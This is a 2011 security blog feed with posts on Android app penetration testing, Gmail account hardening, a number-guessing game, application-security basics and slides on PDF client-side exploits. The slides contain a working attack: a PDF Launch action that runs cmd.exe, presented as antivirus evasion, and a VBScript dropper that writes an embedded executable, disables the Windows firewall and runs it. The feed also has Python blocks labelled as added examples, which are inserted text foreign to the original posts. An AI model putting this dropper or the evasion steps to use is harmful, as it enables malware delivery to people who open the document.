hakers.info » w0rm: Hacking made easy... (feed generated Tue, 18 Oct 2011 06:20:51 +0000)

Android Penetration Testing (PenTesting Android Apps)
http://localhost:8008/site/2011/10/android-penetration-testing-pentesting-android-apps/
Tue, 18 Oct 2011 05:37:46 +0000, by w0rm

A report by McAfee for the last quarter states that the
‘Count of new Android-specific malware moved to number one, with J2ME (Java Micro Edition) coming in second while suffering only a third as many malware.’ In simple words, if you own an Android phone, the chances of it being compromised are 2.5 times higher than on any other platform.

With the industry reporting so many new Android exploits and malware, it is becoming a tedious job for developers to secure their applications. Nearly all IT companies with expertise in web penetration testing have started building solutions for mobile penetration testing. But what is the need for a separate solution for mobile app testing? Isn’t it the same as web application testing? If you consider ‘thin client’ mobile apps, the answer is yes: for thin client mobile apps, penetration testing is almost the same as web application testing. But if you consider ‘thick client’ or ‘native’ mobile apps, which get installed on the device, the penetration tester has to add some more test cases and the testing environment needs a bit of tweaking.
If we compare web penetration testing and mobile PT, what exactly is the difference? One major difference is that in the case of web applications the user does not have access to the application’s files (php, asp, jsp files), whereas in the case of mobile the user has access to the application because it is installed on the device itself. All of the platforms provide some kind of database for those applications to store data (SQLite3 on Android), whereas web applications only have the privilege to store data temporarily using cookies or the cache. One more major drawback of mobile apps is that they can be reversed very easily, whether it’s a dex (Android), jar/jad (J2ME) or a sis (Symbian).
For penetration testing of an Android application we mainly have to consider the following:

* Setting up the PT lab/environment.
Here you will learn how to set up the test environment using the emulator and proxy tools. Using these proxy tools you can force the emulator to pass its traffic via a proxy, but this setting only works for the browser inside the emulator. For apps to work with a proxy you need a different environment setting, which is discussed in detail in the post “Setting up proxy for apps in android emulator”.

* Using debugging tools like ADB and DDMS.
Using a debugging tool like ADB you can run commands on the emulator or the device itself to perform any kind of action: you can get a shell, view the stored files and databases, install and uninstall apps, and pull and push files from the device. DDMS is essentially a GUI version of ADB. For more detail see the post “Using Adb and DDMS for Android Penetration Testing”.

* Reversing apps.
One of the major drawbacks of mobile apps is that they can be reversed. There are many open source tools for reversing Android apps, such as apktool, baksmali and dex2jar. See the post “Reversing and Spoofing Android Applications” for more on this.

Thanks for watching. The next article will be on “Deep Dive into Android Malwares”.
Njoy!!

Using Adb and DDMS for Android Penetration Testing
http://localhost:8008/site/2011/10/using-adb-and-ddms-for-android-penetration-testing/
Tue, 18 Oct 2011 05:24:05 +0000, by w0rm

Android Debug Bridge (adb) is a versatile command line tool that lets you communicate with an emulator instance or a connected Android-powered device. It is a client-server program that includes three components:

* A client, which runs on your development machine. You can invoke a client from a shell by issuing an adb command. Other Android tools such as the ADT plugin and DDMS also create adb clients.
* A server, which runs as a background process on your development machine. The server manages communication between the client and the adb daemon running on an emulator or device.
* A daemon, which runs as a background process on each emulator or device instance.
Source: developer.android.com
The best available description of ADB is at http://developer.android.com/guide/developing/tools/adb.html.
To see how adb can be helpful for penetration testing of Android apps, watch the video embedded in the post.

Reversing and Spoofing Android Applications
http://localhost:8008/site/2011/10/reversing-and-spoofing-android-applications/
Tue, 18 Oct 2011 05:16:50 +0000, by w0rm

One of the major drawbacks of mobile apps is that they can be reversed. If we look at the Android app architecture, the developer’s source code is compiled into a ‘.dex’ file, the Dalvik executable, which can be compared with the ‘.jar’ file of Java. The dex file, bundled with the resource files, is archived to become an APK file. So an apk file is just an archive, similar to a zip file, whose contents can be extracted using any archive tool like WinZip or 7-Zip. After extracting the files from an apk you’ll get a ‘classes.dex’ file which contains the actual code of the application. This dex file can be reversed using many open source tools like baksmali, dex2jar and apktool.
The video attached below shows how we can use the baksmali tool to decompile the application and compile it again. The one thing that gets eliminated by this process is the application signature: after recompiling the application we need to sign it again so that it can be installed on a device or emulator.

Hope you enjoyed it!!
We’ll upload some more tutorials for dex2jar and apktool pretty soon!!

Making your Gmail and Google account more secure
http://localhost:8008/site/2011/09/making-your-gmail-and-google-account-more-secure/
Thu, 15 Sep 2011 04:04:31 +0000, by w0rm

Making your Gmail and Google account more secure: a 5 point checklist.

Have you ever thought about what it would be like if your Gmail or Google account password were compromised? For a person like me who keeps backups of all important documents, research papers, links, photos (the ones you cannot keep on the home computer either :-) ) and nearly everything else on the Google cloud, it matters a lot. Most of us have no idea where and in what form our data is stored there, but still I trust Google more than my personal laptop. We use so many applications like Gmail, Google Docs, Picasa and Orkut, but they all share the same Google account password, and if that gets compromised it’ll be like a tsunami for us; with the number of hackers (including the ethical ones :-) ) growing in this world, the probability of that becomes pretty high. People can break in using a network level attack, by abusing poor password recovery options, or, if you think you are too intelligent to use your vehicle’s name or your girlfriend’s/boyfriend’s name as a password, your hacker friend will not take much time to prove that you are a ‘@#$#@$’.
Well, coming to the point: “How to make your Gmail and Google accounts more secure”. There is no special trick or hack to do so. Google has provided many features and options for this; you just have to use them in the right way. Here is the checklist of options you should use to ensure that your Google account is safe enough.

1.) Use a secure connection when signing in – Google uses https by default, but to make sure that Google always uses https, select the “Always use https” option under “Browser connection:” in the “General” tab of your Gmail settings.

This makes sure that your user credentials are passed in encrypted form, which prevents network level attacks.

2.) Change your password regularly – With ‘123456’ being the most commonly used password in the world, you should start using a combination of numbers, special characters, and upper- and lower-case letters for your password, and avoid dictionary words. (Even if your dear one’s name is not in the dictionary, avoid using such passwords :) )

3.) Update your account recovery options – Make sure that your recovery email address is correct and that you are still using it. It’s really important, as I have seen a case where a person’s recovery email id was never used and had expired, which left it available for anyone to take. Make sure to add your mobile number, as Google can send you a recovery code via SMS, which can be very handy. The last recovery option is the ‘Secret Question’, which is only available if you have not signed in during the past 24 hours. The answer to the security question should be hard for others to guess, so choose a difficult secret question, and make sure you remember the answer yourself :-) .

4.) Turn on 2-step verification – This option adds one more factor of authentication (two factor authentication) to your Google account. Two factor authentication implies the use of two independent means of evidence to assert an identity, rather than two iterations of the same means. “Something one knows”, “something one has” and “something one is” are the usual simple summaries of the three independent factors. For 2-step verification Google uses a verification code that is time specific. If you turn on this option for your Google account, each time you try to log in a Google verification code will be asked for (you can have Google remember a computer). The next question may be: how do I get this verification code? Google provides many ways to get it: you can install a mobile application that generates the code, Google can send you an SMS containing the code, or you can print some static backup codes and keep them somewhere accessible, like your wallet. You can turn on 2-step verification using this link: “https://www.Google.com/accounts/b/0/SmsAuthConfig”. Try to subscribe to all the ways of getting your verification code, as not all of them are accessible all the time. For example, if you have subscribed only to SMS as a way of receiving the verification code and you forget to take your mobile somewhere, you will not be able to access your Google account.

5.) Keep monitoring your account details – Check the list of websites that are authorized to access your Google account data. Go to My Account > Authorizing applications and sites; you’ll see the list of all third-party sites you’ve granted access to. If you see a website to which you think you have not granted access, immediately revoke the access for that site. The second thing you should monitor is the ‘Last Account Activity’. At the bottom right of your Gmail page you’ll see ‘Last account activity’ with a link for details. By clicking on that link you can monitor how many sessions are presently open, with the access type, location and time of access.

Don’t forget to visit Google’s security tips and the Gmail security checklist for further information.
References:
Google security tips: http://www.google.com/help/security/index.html
Gmail Security Checklist: https://mail.google.com/support/bin/static.py?page=checklist.cs&tab=29488
Two-Factor Authentication, Wikipedia

Setting up proxy for apps in android emulator
http://localhost:8008/site/2011/08/setting-up-proxy-for-apps-in-android-emulator/
Tue, 16 Aug 2011 11:52:55 +0000, by w0rm

Proxy for Android apps not working even after you tried all the proxy settings in the emulator? Is your Android proxy setting only working for the browser and not for the apps in the emulator?

In a previous post (http://hakers.info/site/2011/08/setting-up-proxy-for-android-emulator/) we saw how to set up a proxy for the Android emulator using the settings available in the emulator itself. The problem with that approach is that it works only for the browser; it does not work for the apps installed inside the emulator. As I couldn’t find any solution for this problem in the Android emulator, I looked for a workaround. The one I found is to use the base machine itself to capture the packets which the emulator (the apps in the emulator) is sending.

We can use many network analyzer tools like Wireshark to capture and analyze the packets, but with these tools you can only capture; there is no option to tamper with the packets at runtime. If the requirement is only to capture and analyze packets, Wireshark will suffice. But if you want to tamper with the request and response (which we normally do using Paros/Fiddler for web applications) you need a tool which can capture network packets and also intercept and modify them.

One tool I can suggest is Echo Mirage by BindShell, which has nearly all of the features we need. It uses DLL injection and function hooking techniques to redirect network related function calls so that data transmitted and received by local applications can be observed and modified. Because of these techniques the tool attaches itself to a particular ‘exe’, so only the packets of that exe are captured (with Wireshark we have to use a filter, as it captures each and every packet that goes out of the machine).

To set up a proxy using Echo Mirage, use the steps given below:

1.) Download the latest version of Echo Mirage.

The latest version of Echo Mirage can be downloaded from:

http://www.bindshell.net/tools/Echo Mirage.html

2.) Open Echo Mirage and the emulator.

3.) After both applications are running, we need to inject Echo Mirage into emulator.exe. To do so, click on the second tab in Echo Mirage (inject into process), enter the process name emulator.exe (or click on select process and select emulator.exe), and click on start.

4.) If everything works fine you will get a window like this.

5.) Echo Mirage is now ready to trap and intercept all requests sent through emulator.exe. The screenshot of the interceptor below was taken when I tried to open the Maps application in the emulator after setting up Echo Mirage.

You can watch this video to see how to use Paros and Echo Mirage to set up the proxy for the Android emulator or devices.

Hope this article was helpful and will further help you in penetration testing of Android apps.

Please comment if you have some questions or you want some more clarifications.

Setting up proxy for android emulator
http://localhost:8008/site/2011/08/setting-up-proxy-for-android-emulator/
Mon, 08 Aug 2011 13:20:32 +0000, by w0rm

Facing some issues in setting up a proxy for the Android emulator?

This article will tell you the steps you need to follow to set up a proxy for Android applications using the emulator. For this you require three basic things: a machine connected to the internet, the Android SDK, and a proxy tool (Paros, Fiddler, Burp Suite etc.). Once all of this software is ready, the first step is to set up the proxy server using any of these tools. I’ll show you how to do it with Paros.

In Paros go to Tool>>Options>>Local proxy and enter the address (127.0.0.1 for localhost) and port number (e.g. 8080) on which you want your proxy server to listen. Please refer to the screenshot below for the options page in Paros.

Screenshot: Android Proxy Paros Settings

If your machine uses an outgoing proxy server to access the internet, you can enter those settings (including authentication details) in the connection tab as shown below. Click OK to save your settings, and your proxy server is configured to listen on the address and port you just entered.

Screenshot: Android Proxy Paros outgoing proxy settings

The next step is to make some changes in the emulator so that it sends all http requests to the proxy server we have just configured. The simplest method is to change the APN settings in the emulator. Start the emulator and go to Settings>>Wireless and networks>>Mobile networks>>Access Point Names and click on the APN you are using (by default it’s Telkila). In the ‘proxy’ and ‘port’ options you have to enter the address and port on which your proxy server is listening. Ideally we would write 127.0.0.1 under proxy, pointing to the localhost of the base machine, but inside the Android emulator this IP is the emulator’s own localhost. To resolve this, the Android emulator has some hardcoded IP addresses that do this work for us: to reach the base machine’s localhost the IP to use is 10.0.2.2. So under proxy enter “10.0.2.2” and under port enter the port number you configured in the proxy server (port 8080 in my case). Save your settings and your proxy setup is done.

Screenshot: Android Emulator Proxy Settings

Now if you try to open a website in the emulator’s browser, the proxy tool will be able to catch those requests, and you can tamper with any request and response to test your Android app.

Screenshot: Google on Android Browser

Screenshot: Tampering Request using Paros

NOTE: Using this proxy environment you can only trap requests from the emulator’s browser. I could not find a way to trap requests going through apps installed in the emulator, but there is an alternative method. My next article, “Setting up proxy for apps in android emulator”, will help you do so.

You can watch this video to see how to use Paros and Echo Mirage to set up the proxy for the Android emulator or devices.

Reading your Mind
http://localhost:8008/site/2011/07/reading-your-mind/
Sun, 31 Jul 2011 09:42:29 +0000, by w0rm

This is a small mind reading game. You have to think of a number between 1 and 63 (including 1 and 63). Some lists will be shown to you and you have to tell me which of the lists your number appears in, and I’ll tell you the number which is in your mind.

Check the lists in which your number appears.

List 1 : 1 , 3 , 5 , 7 , 9 , 11 , 13 , 15 , 17 , 19 , 21 , 23 , 25 , 27 , 29 , 31 , 33 , 35 , 37 , 39 , 41 , 43 , 45 , 47 , 49 , 51 , 53 , 55 , 57 , 59 , 61 , 63

List 2:  2 , 3 , 6 , 7 , 10 , 11 , 14 , 15 , 18 , 19 , 22 , 23 , 26 , 27 , 30 , 31 , 34 , 35 , 38 , 39 , 42 , 43 , 46 , 47 , 50 , 51 , 54 , 55 , 58 , 59 , 62 , 63

List 3:  4 , 5 , 6 , 7 , 12 , 13 , 14 , 15 , 20 , 21 , 22 , 23 , 28 , 29 , 30 , 31 , 36 , 37 , 38 , 39 , 44 , 45 , 46 , 47 , 52 , 53 , 54 , 55 , 60 , 61 , 62 , 63

List 4:  8 , 9 , 10 , 11 , 12 , 13 , 14 , 15 , 24 , 25 , 26 , 27 , 28 , 29 , 30 , 31 , 40 , 41 , 42 , 43 , 44 , 45 , 46 , 47 , 56 , 57 , 58 , 59 , 60 , 61 , 62 , 63

List 5:  16 , 17 , 18 , 19 , 20 , 21 , 22 , 23 , 24 , 25 , 26 , 27 , 28 , 29 , 30 , 31 , 48 , 49 , 50 , 51 , 52 , 53 , 54 , 55 , 56 , 57 , 58 , 59 , 60 , 61 , 62 , 63

List 6:  32 , 33 , 34 , 35 , 36 , 37 , 38 , 39 , 40 , 41 , 42 , 43 , 44 , 45 , 46 , 47 , 48 , 49 , 50 , 51 , 52 , 53 , 54 , 55 , 56 , 57 , 58 , 59 , 60 , 61 , 62 , 63
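The trick behind the six lists, as an added example that is not part of the original post: list k holds exactly the numbers whose binary bit (k-1) is set, so the chosen number is the sum of the first entries of the ticked lists. The code generalises the game to any number of lists and checks that every number from 1 to 63 is recovered.

```python
# Added example (not from the original post): the binary trick behind the game.
# List k (k = 1..6) contains every number from 1 to 63 whose bit (k-1) is set,
# so its first entry is 2**(k-1) and the secret number is the sum of the first
# entries of the lists the player ticks.

MAX_NUMBER = 63          # six lists cover 1..63 (2**6 - 1)
LIST_COUNT = 6


def build_lists(max_number=MAX_NUMBER, list_count=LIST_COUNT):
    """Return the lists exactly as printed in the post: list k holds every
    number whose bit (k-1) is set.  Works for any list_count / max_number."""
    return [
        [n for n in range(1, max_number + 1) if n & (1 << k)]
        for k in range(list_count)
    ]


def lists_containing(number, lists):
    """The lists (1-based) a player would tick for a given number."""
    return [k + 1 for k, entries in enumerate(lists) if number in entries]


def read_mind(ticked_lists):
    """The 'mind reader': add 2**(k-1), the first element, of every ticked list."""
    return sum(1 << (k - 1) for k in ticked_lists)


def self_check():
    """Confirm the trick recovers every number from 1 to 63 and that the
    generated lists match the ones printed in the post."""
    lists = build_lists()
    assert lists[0][:5] == [1, 3, 5, 7, 9]
    assert lists[5][0] == 32 and len(lists[5]) == 32
    for n in range(1, MAX_NUMBER + 1):
        assert read_mind(lists_containing(n, lists)) == n
    return True


if __name__ == "__main__":
    for k, entries in enumerate(build_lists(), start=1):
        print(f"List {k}: {entries}")
    # Constructed sample: a player who ticks lists 1, 3 and 6 thought of 1+4+32.
    print("Ticked lists 1, 3, 6 ->", read_mind([1, 3, 6]))
```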

Application Security – The Basics
http://localhost:8008/site/2011/07/application-security-the-basics/
Thu, 28 Jul 2011 15:18:04 +0000, by w0rm

The Institute for Security and Open Methodologies (ISECOM) defines security as “a form of protection where a separation is created between the assets and the threat”.
Security in general has many categories: it can be the security of physical assets like a home, an airport or infrastructure, or some kind of political security like human security or national security, or computer security, which itself has many categories.

Despite so many categories of security, two entities are always involved: the asset and the threat. In all scenarios the “asset” has to be protected from the “threat”. Consider home security: we all lock our doors before going out. Here the home is the asset and the thieves are the threat. If a thief is intelligent enough he will gather all the information he can, like at what time the home is usually vacant, how many people live there, or what kind of lock you use. All this information will help him breach your home security.
Similarly in the IT security world, the asset may be the data flowing through a network, data stored on a server, or a database, and the threats are the hackers. As with thieves, the hacker’s first step is “information gathering”.
With reference to information security, we can divide security into categories like application security, data security, network security and others. In this article we will focus on the basics of application security.
‘Wiki’ says application security encompasses measures taken throughout the application’s life-cycle to prevent exceptions in the security policy of an application or the underlying system (vulnerabilities) through flaws in the design, development, deployment, upgrade, or maintenance of the application. In simple words, it comprises the security issues involved in any type of application, whether written in Java, PHP, C++, Python or anything else.

Application Security Trends
The internet is growing tremendously, to the point that IPv4 addresses are getting depleted. With the growth in the number of users and the sophistication of technology, the attack vectors have also increased. The graph below, from a study by the SANS Institute, depicts the growth in the number of attack vectors in the first half of 2010.

Thus, with the increasing sophistication and numbers of attacks and defense techniques, it has become a cat and mouse game.

Attacks earlier focused on the operating systems themselves. However, with continuous effort and improvement on the operating systems, vulnerabilities have become difficult to find in them, shifting the fulcrum from the operating system to targeted applications. The graph below shows the trend for four popular applications, i.e. Adobe Reader, MS Word, MS Excel and MS PowerPoint. If you look at Adobe, you will see that the vulnerabilities increased drastically for the year 2010.

So, it can be said that the two sides of the application security, both good and bad, are in a constant state of evolution.

The malicious guy comes in: THE HACKER
There are people with malicious intent who may be looking to compromise your assets. They might be technology geeks, freaks and motivated hackers, attacking your applications just for fun or for profit. Many times they are also funded by high profile companies or even governments to target the sensitive data and assets of the companies or countries they are in competition with. The well known Stuxnet worm and the Aurora attacks are just a few examples of this; however, there may be many attacks that go unnoticed by governments and organizations.

These attackers try to gather as much information as possible about the target. This involves a lot of searching on search engines, news groups, job sites, your own site, public forums, and social networks like Facebook, MySpace, Orkut etc. A lot of information can be harvested in this manner which can later be misused to breach security. This information includes email ids, dates of birth, likes and dislikes, girlfriends and boyfriends, the software used in the company, location and much more. A popular quote in the hacking world says “Determined hackers spend 90% of their time in the information gathering phase; the remaining 10% is spent on the breach”.
Knowing the threats: Build your walls strong enough
The assets need to be secured from the threats. However, to secure the assets, there needs to be proper knowledge of the boundaries of the application through which input comes. In simple words, the first rule of security is “user input MUST not be trusted”. So, to secure the application, the application castle should be strong enough to stop malicious input at the walls themselves. This approach is called input validation. The other approach is that even if the enemy enters the castle, don’t let them get away, or cripple them. This approach is termed output validation. These threats can come from any input, which may include a form field, URL, cookies, POST parameters etc. These inputs should not be trusted in any manner, as this “trust” is what leads to the compromise.

Deeply understanding the threats: Ohh… they are so many
Attack techniques have evolved over time, and there are many ways in which applications can be compromised. The attacks include, but are not limited to:
•    Cross site scripting
•    SQL injection
•    Buffer overflows
•    Cross site request forgery
•    XPATH injection
•    Format string attacks
•    Heap overflows
•    Redirection attacks
•    Authentication attacks
•    Authorization attacks
•    Canonicalization attacks
•    OS commanding
•    SSI includes
•    Parameter pollution
•    Session based attacks
•    Sniffing
•    Spoofing
•    Phishing
These are only a few examples; many more exist and the list keeps getting updated on a regular basis. A simple Google search on “Cross site scripting” or any of the others will give you thousands of results, which are enough to explain the vulnerability. There are many security projects (OWASP) and institutes (SANS) working to create freely available articles, methodologies, documentation, tools, and technologies that provide unbiased, practical, cost-effective information about application security. These communities also release a list of the top vulnerabilities at regular intervals.
Save Me Please
For each of these vulnerabilities there exist different ways to mitigate them. However, speaking generically, all of them can be prevented by proper validation of both input and output. If only one of these is done, the vulnerability can still be exploited by an attacker, so it is always better to have a two way defense mechanism which acts as a double shield against attacks on the application. When an application is developed, an approach that ensures both validations at the same time should be followed; this is the best possible solution to mitigate the attacks. As far as targeted applications like Acrobat Reader or Microsoft applications are concerned, the only way to save yourself is to install the updates released by the vendors; even if you miss a single update your machine is vulnerable to any type of attack. Presently there are many tools to prevent applications from getting hacked, but in the end it’s in the hands of the application developer to make the application secure enough: not only check that all the doors are locked, but ensure that every other entry point is also locked and secured.
Conclusion
Thus, we can conclude that threats to applications are on a continuous rise, and developers need to be aware of these and educate themselves so as to adopt a secure methodology in the development lifecycle. These vulnerabilities are large in number, and hence require thorough study.

Client Side Exploits Using PDF
http://localhost:8008/site/2011/07/client-side-exploits-using-pdf/
Thu, 28 Jul 2011 15:13:46 +0000, by w0rm

Video for embedding exe in a pdf file

Contents of Presentation!!
  1. Client Side Exploits using PDF (C0C0N Security & Hacking Conference)
  2. Contents: About PDF, Launch Action Exploits, AcroJS Exploits, Road Ahead, Tools and References
  3. About PDF
    • What is PDF?
    • Incidents in the wild
    • Why pdf attacks?
    • PDF document structure
  4. Potentially Dangerous File / Penetration Document Format
    • Stands for Adobe Portable Document Format
    • Reliable and platform independent exchange and manipulation of electronic data
    • Has become the most widespread document description format in the world
  5. Adobe PDF – As a programming language
    • PDF document is more than a powerful document format
    • Has a complete programming language of its own
    • Dedicated to document creation and manipulation
    • Relatively strong execution features
  6. Adobe PDF – Security Issues
  7. 2010: Still Continuing…
  8. 2010: Still Continuing… (chart covering March to June)
  9. Incidents in the wild
    • Jun 14 CVE-2010-1297 PDF Adobe 0-Day WEO from [email_address]
    • Jun 20 CVE-2010-1297 PDF Meeting agenda from [email_address]
    • Jun 21 CVE-2010-1297 PDF About the recent US-Japan Economic Relations
    • Jun 21 CVE-2010-1297 PDF Adobe 0-Day About the recent US-Japan Economic Relations – with Poison Ivy
    • Jun 27 CVE-2009-0927 PDF Discussion on cross-strait maritime cooperation
    • Jul 6 CVE-2010-1297 PDF EPA’s Water Sampling Report from spoofed [email_address]
    • Jul 14 CVE-2009-4324 PDF President Obama’s Detrimental Deadlines
  10. The Reign of Zeus:
    • Zeus (also known as Zbot, PRG, Wsnpoem, Gorhax and Kneber) is a Trojan horse that steals banking information by keystroke logging.
    • Found in July 2007 when it was used to steal information from the United States Department of Transportation. It became more widespread in March 2009.
    • In June 2009, security company Prevx discovered that Zeus had compromised over 74,000 FTP accounts on websites of companies like: Bank of America, NASA, Monster, ABC, Oracle, Cisco, Amazon, BusinessWeek
    • ZeuS is sold in the criminal underground as a kit for around $3000-$4000, and is likely the one piece of malware most used by criminals specializing in financial fraud. ZeuS has evolved over time and includes a full arsenal of information stealing.
  11. The Reign of Zeus
    • A recent breakthrough in spreading Zeus via PDF files threatens to further its spread. The pdf file (detected as Exploit.JS.Pdfka.bui) contained an exploit for the CVE-2010-0188 vulnerability, a buffer overflow that manifests itself when the field containing the image is accessed.

    (chart) CVE-2010-0188 exploit statistics 2010

  12. Popular in malwaredomainlist.com
  13. Apple iPhone / iPad / iPod Code Execution and Sandbox Bypass
    • VUPEN ID – VUPEN/ADV-2010-1992
    • Release date – 2010-08-03
    • It is caused by a memory corruption error when processing Compact Font Format (CFF) data within a PDF document, which could be exploited by attackers to execute arbitrary code by tricking a user into visiting a specially crafted web page using Mobile Safari
  14. Why PDF
    • Popularity and usability
    • Flexibility, platform independence, rich text
    • Trust level is high: a PDF is perceived as a static piece of information
    • Rich API, easy to exploit or misuse
    • Dominance of Adobe Reader, huge scope for attack
  15. PDF document structure
    • The general structure of a PDF file is composed of the following code components: header, body, cross-reference (xref) table, and trailer, as shown in figure 1.
  16. PDF Document Structure
    • (Figure 1: PDF header, body of objects, cross-reference table, trailer)
  17. Launch Action
    • Launch Action API
    • Some Examples
    • Evading Antivirus
    • With embedded EXE
  18. Launch Action Vulnerability
    • A launch action launches an application or opens or prints a document. Following are the action dictionary entries specific to this type of action.
    • ENTRIES
    • S : name
    • (Required) The type of action that this dictionary describes; shall be Launch for a launch action.
    • F : file specification
    • (Required if none of the entries Win, Mac, or Unix is present) The application that shall be launched or the document that shall be opened or printed. If this entry is absent and the conforming reader does not understand any of the alternative entries, it shall do nothing.
    • Win : dictionary
    • (Optional) A dictionary containing Windows-specific launch parameters.
  19. Launch Action Vulnerability
    • PARAMETERS
    • F : byte string
    • (Required) The file name of the application that shall be launched or the document that shall be opened or printed, in standard Windows pathname format. If the name string includes a backslash character (\), the backslash shall itself be preceded by a backslash. This value shall be a simple string; it is not a file specification.
    • P : byte string
    • (Optional) A parameter string that shall be passed to the application designated by the F entry. This entry shall be omitted if F designates a document.
  20. Launch Action Vulnerability
    • Open command prompt
    • Open website

  21. Launch Action Vulnerability
    • Open notepad.exe
  22. Launch Action Vulnerability
  23. Launch Action Vulnerability
    • Changing the message
  24. Launch Action Vulnerability
    • (Dialog text from the screenshot: “Confidential Data!! If You are Authorized Click on ‘Open’. Check ‘Do Not Show This Message Again’ to avoid this dialog next time”)
  25. Launch Action Vulnerability
  26. Launch Action in 9.3.3
  27. Launch Action Vulnerability
  28. Evading Antivirus by Changing the format
    • You can take any other PDF data type and give it a number by wrapping it in "obj" and "endobj". Then later on, when you want to use that chunk of data, you can reference it, by number, with the "R" operator.
    • These two examples are equivalent to Acrobat:
      • 2 0 obj (Hello World) endobj
      • 3 0 obj << /Example 2 0 R >> endobj
      • 3 0 obj << /Example (Hello World) >> endobj

  29. Evading Antivirus
    • What You Can Leave Out
      • All Page data
      • All Whitespace, except for End-Of-Line after comments
      • The version number part of %PDF-1.1
      • The %%EOF
      • The xref table
      • And thus also startxref
      • Most Object /Types
    • So what’s actually required?
      • %PDF- followed by anything, but if the file is too confusing for Acrobat you need at least the first number, like %PDF-1.
      • A trailer with a /Root dictionary for the Catalog
      • A /Pages dictionary, which can be empty as long as it is of dictionary type.
      • An /OpenAction if you want to launch your JavaScript upon file open.
      • The JavaScript action.
  30. Evading Antivirus
    • %PDF-1.
    • trailer<</Root<</Pages<<>>/OpenAction<</S/Launch/Win<</F(cmd.exe)/P<0A0A0A0A0A0A0A0A4E6F74653A2054686973206973206120736563757265205044462E20546F207669657720746865207365637572656420636F6E74656E7420706C6561736520636C69636B2074686520224F70656E2220627574746F6E2062656C6F772E>>>>>>>>>
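A defender-side check for the two tricks on slides 28-30 (a trailer-only file, and a Launch dictionary spread over indirect objects), written as an added Python example rather than code from the slides: it inlines `n g R` references, decodes `<hex>` strings, and then looks for the same keywords pdfid.py counts. The two sample files are constructed for this example; their /F and /P values are taken from the slides.

```python
import re

# Dictionary keys the slides single out as launch / script indicators (pdfid-style).
SUSPICIOUS = (b"/OpenAction", b"/AA", b"/Launch", b"/JavaScript", b"/JS")
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.S)
REF_RE = re.compile(rb"(\d+)\s+(\d+)\s+R\b")
HEX_RE = re.compile(rb"(?<!<)<([0-9A-Fa-f\s]+)>")  # <hex string>, never a << dictionary

def resolve_refs(data, rounds=8):
    """Inline every 'n g R' reference so a dictionary that was split over
    several objects (the slide's evasion trick) reads like the flat original."""
    objects = {(int(n), int(g)): body.strip() for n, g, body in OBJ_RE.findall(data)}
    for _ in range(rounds):  # bounded so a self-referencing object cannot loop forever
        new = REF_RE.sub(lambda m: objects.get((int(m[1]), int(m[2])), m[0]), data)
        if new == data:
            break
        data = new
    return data

def decode_hex_strings(data):
    """Rewrite <48656C6C6F> as (Hello) so keyword and string matching sees the real text."""
    def sub(m):
        h = re.sub(rb"\s", b"", m[1])
        raw = bytes.fromhex((h + b"0" * (len(h) % 2)).decode())  # odd digit count pads with 0
        esc = raw.replace(b"\\", b"\\\\").replace(b"(", b"\\(").replace(b")", b"\\)")
        return b"(" + esc + b")"
    return HEX_RE.sub(sub, data)

def literal_after(key, text):
    """First literal string '(...)' following key, with PDF backslash escapes removed."""
    m = re.search(re.escape(key) + rb"\s*\(((?:\\.|[^\\)])*)\)", text, re.S)
    return re.sub(rb"\\(.)", rb"\1", m[1]).decode("latin-1") if m else None

def scan(pdf_bytes):
    """Indicators present after normalisation, plus the Launch target and its /P lure text."""
    norm = decode_hex_strings(resolve_refs(pdf_bytes))
    found = [k.decode() for k in SUSPICIOUS if re.search(re.escape(k) + rb"\b", norm)]
    target = params = None
    pos = norm.find(b"/Launch")
    if pos != -1:
        target, params = literal_after(b"/F", norm[pos:]), literal_after(b"/P", norm[pos:])
    return {"indicators": found, "launch_target": target, "launch_params": params}

# Constructed samples modelled on slides 28-30; the /P hex string spells "Confidential Data".
LURE = b"436F6E666964656E7469616C2044617461"
FLAT = (b"%PDF-1.\ntrailer<</Root<</Pages<<>>/OpenAction<</S/Launch/Win<</F(cmd.exe)/P<"
        + LURE + b">>>>>>>>>")
SPLIT = (b"%PDF-1.\n1 0 obj<</S/Launch/Win 2 0 R>>endobj\n2 0 obj<</F(cmd.exe)/P<" + LURE
         + b">>>endobj\ntrailer<</Root<</Pages<<>>/OpenAction 1 0 R>>>>")

if __name__ == "__main__":
    print(scan(FLAT))
    print(scan(SPLIT))  # same verdict although the Launch dictionary is split across objects
```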
  31. Evading Antivirus
  32. POC: Launching an Embedded exe
    • Step 1 : Embed the hex content of the exe in a VBScript which extracts it out to the file system and runs it.
    • Step 2 : Embed that VBScript in the PDF file as comments.
    • Step 3 : Launch cmd.exe and create another script which extracts the main VBScript from the PDF and runs them both.
  33. Step 1 : Embed the hex content of the exe in a vbscript
    • Dim b,bl
    • Function c(d)
    • c=chr(d)
    • End Function
    • b=Array(c(77),c(90),c(144),c(0),c(3),c(0), c(0)….,"")
    • bl = 3072
    • Set fso = CreateObject("Scripting.FileSystemObject")
    • Set f = fso.OpenTextFile("helpme.exe", 2, True)
    • For i = 0 To bl
    • f.write(b(i))
    • Next
    • f.close()
    • Set WshShell = WScript.CreateObject("WScript.Shell")
    • WshShell.Run "netsh firewall set opmode disable", 0, True
    • WshShell.Run "helpme.exe", 0, False
    • WshShell.Run "taskkill /IM cmd.exe /F", 0, False

    (Callout: hex content of the exe as a character array)

  34. Step 2 : Embed the vbscript in the pdf file as comments
    • %'SS
    • %Dim b,bl;Set WshShell = Function c(d);c=chr(d);End Function;b=Array(c(77),c(90),c(144),c(0),…..,"");bl = 3072;Set fso = CreateObject("Scripting.FileSystemObject");Set f = fso.OpenTextFile("helpme.exe", 2, True);For i = 0 To bl;f.write(b(i));Next;f.close(); Set WshShell = WScript.CreateObject("WScript.Shell") ;WshShell.Run "netsh firewall set opmode disable", 0, True;WshShell.Run "helpme.exe", 0, False;WshShell.Run "taskkill /IM cmd.exe /F", 0, False
    • %'EE
    • 6 0 obj
    • [/PDF /Text]
    • endobj
  35. Step 3 : Launch cmd.exe and create another script
    • /c echo Set fso=CreateObject("Scripting.FileSystemObject") > execute.vbs && echo Set f=fso.OpenTextFile("EmbeddedExePoC.pdf", 1, True) >> execute.vbs && echo pf=f.ReadAll >> execute.vbs && echo s=InStr(pf,"'SS") >> execute.vbs && echo e=InStr(pf,"'EE") >> execute.vbs && echo s=Mid(pf,s,e-s) >> execute.vbs && echo Set z=fso.OpenTextFile("toexecute.vbs", 2, True) >> execute.vbs && echo s = Replace(s,"%","") >> execute.vbs && echo s = Replace(s,";",vbcrlf) >> execute.vbs && echo z.Write(s) >> execute.vbs && execute.vbs && toexecute.vbs
  36. Generated VBScript
